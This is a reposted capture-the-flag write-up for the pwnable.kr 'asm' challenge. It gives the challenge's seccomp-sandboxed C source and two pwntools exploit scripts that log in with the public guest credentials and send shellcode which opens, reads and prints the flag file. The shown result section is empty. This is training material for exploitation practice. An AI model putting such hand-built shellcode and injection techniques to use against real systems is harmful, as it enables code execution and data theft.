First, look at the source code:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <seccomp.h>
#include <sys/prctl.h>
#include <fcntl.h>
#include <unistd.h>

#define LENGTH 128

void sandbox(){
    // default action: kill the process on any syscall not allowed below
    scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL);
    if (ctx == NULL) {
        printf("seccomp error\n");
        exit(0);
    }

    // allowlist: only open/read/write/exit/exit_group may be used
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(open), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0);

    if (seccomp_load(ctx) < 0){
        seccomp_release(ctx);
        printf("seccomp error\n");
        exit(0);
    }
    seccomp_release(ctx);
}

// stub: xor rax..r15 with themselves, so every general-purpose register is zero
// before the user-supplied shellcode runs
char stub[] = "\x48\x31\xc0\x48\x31\xdb\x48\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\x31\xff\x48\x31\xed\x4d\x31\xc0\x4d\x31\xc9\x4d\x31\xd2\x4d\x31\xdb\x4d\x31\xe4\x4d\x31\xed\x4d\x31\xf6\x4d\x31\xff";
unsigned char filter[256];

int main(int argc, char* argv[]){
    setvbuf(stdout, 0, _IONBF, 0);
    setvbuf(stdin, 0, _IOLBF, 0);

    printf("Welcome to shellcoding practice challenge.\n");
    printf("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.\n");
    printf("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.\n");
    printf("If this does not challenge you. you should play 'asg' challenge :)\n");

    // one RWX page (7 = PROT_READ|PROT_WRITE|PROT_EXEC) at the fixed address 0x41414000
    char* sh = (char*)mmap(0x41414000, 0x1000, 7, MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE, 0, 0);
    memset(sh, 0x90, 0x1000);            // fill with NOPs
    memcpy(sh, stub, strlen(stub));      // register-clearing stub first
    int offset = sizeof(stub);

    printf("give me your x64 shellcode: ");
    read(0, sh+offset, 1000);            // user shellcode follows the stub

    alarm(10);
    chroot("/home/asm_pwn");    // you are in chroot jail. so you can't use symlink in /tmp
    sandbox();
    ((void (*)(void))sh)();
    return 0;
}

The challenge gives a hint:

Connect to local port 9026, where asm is running; you then get the flag. The flag file is:

this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong

So the exploit is as follows:

from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
filename='this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong\0'
con = ssh(host='pwnable.kr', user='asm', password='guest', port=2222)
p = con.connect_remote('localhost', 9026)
# cn = process('./asm')   # local run instead of the remote service
p.recvuntil('shellcode: ')
# hand-written shellcode: read(0, buf, 0x100) takes the file name from stdin,
# then open(buf, O_RDONLY), read(fd, buf2, 0x200) and write(1, buf2, 0x300)
pay = unhex('31c031ff31d2b601be0101010181f6014640400f056a0258bf0101010181f70146404031d2b60431f60f054889c731c031d2b602be0101010181f6014940400f056a01586a015f31d2b603be0101010181f6014940400f05')
p.send(pay)
p.send(filename)          # consumed by the shellcode's first read()
print(p.recvuntil('\x90'))

The result is as follows:

Appendix:

exp:

from pwn import *
con = ssh(host='pwnable.kr', user='asm', password='guest', port=2222)
p = con.connect_remote('localhost', 9026)
context(arch='amd64', os='linux')   # must be set before using shellcraft/asm
shellcode = ''
shellcode += shellcraft.pushstr('this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong')
shellcode += shellcraft.open('rsp', 0, 0)
shellcode += shellcraft.read('rax', 'rsp', 100)
shellcode += shellcraft.write(1, 'rsp', 100)
# log.info(shellcode)
# p.recvuntil('shellcode: ')
# p.send(asm(shellcode))
# log.success(p.recvline())
print(shellcode)            # the generated assembly
print(p.recv())             # banner and prompt
p.send(asm(shellcode))
print(p.recvline())

1. First call pushstr() to push the file name onto the stack, then call open to open the file
2. Then use read() to read out the file contents
3. Finally use write to write the contents to the screen
4. Use asm to assemble it into shellcode

Reposted from: https://www.cnblogs.com/liuyimin/p/7496363.html
